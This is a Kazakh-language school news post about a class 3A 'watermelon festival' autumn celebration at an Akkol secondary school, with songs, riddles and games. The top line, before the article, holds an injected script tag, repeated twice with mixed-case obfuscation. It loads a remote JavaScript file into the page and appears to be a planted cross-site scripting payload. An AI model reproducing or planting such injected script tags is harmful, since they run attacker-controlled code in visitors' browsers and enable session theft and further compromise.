<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.10.2018

         Мол өнімін арқалап, алтын дәні

жарқырап, берекелі күз келді. Оқу жылының басындағы балалар жақсы көретін

шаралардың бірі – Күз мерекесі.  Ж.

Бектұров атындағы №3 Ақкөл орта мектебінің 

3 «А» сынып оқушылары осы 

мерекені ерекше тойлады. Шараны «Қарбыз тойы» - деп атады. Өйткені

мерекенің негізгі кейіпкері – жасыл- ала қарбыз болды.

Балалар мектепті

әндетіп аралап шықты:

Тамаша, тамаша

Тамаша гой қараса.

Бүгін қарбыз тойы деп,

Дәм татыңыз таласа!

Жолда кездескен

мұғалімдерді, оқушыларды, мектеп қызметшілерін тәтті қарбыздан дәм татқызды.

Төлем ақысына олар күз тақырыбына, жұмбақтар, мақал-мәтелдер айтты. Жақсы

тілектер тіледі. Мереке өткен бөлмеге оралып тойларын  жалғастырды.

Жұмбақтар шешіп тәтті

сыйлықтарға ие болды. Қызықты ойындар ойнады,шағын концерттік бағдарлама болып

, ұлдар «Шудың бойында» әнімен көрермендерді таң қалдырды. Қыздар жапырақтар

биін биледі.  Күз өнімдерінен дастарқан

жайылып, қатысқандар керемет тағамдар мен жеміс-жидектерден татты. Ең қызықтысы

-  мереке бойы жеп жүрген қарбыздың дәндерін жинап, сыйлықтар да ұтып алды. Мереке көңілді

дискотекамен аяқталды.

Просмотров: 456


Пікір қосу



Деректерді қолтаңбаға қосу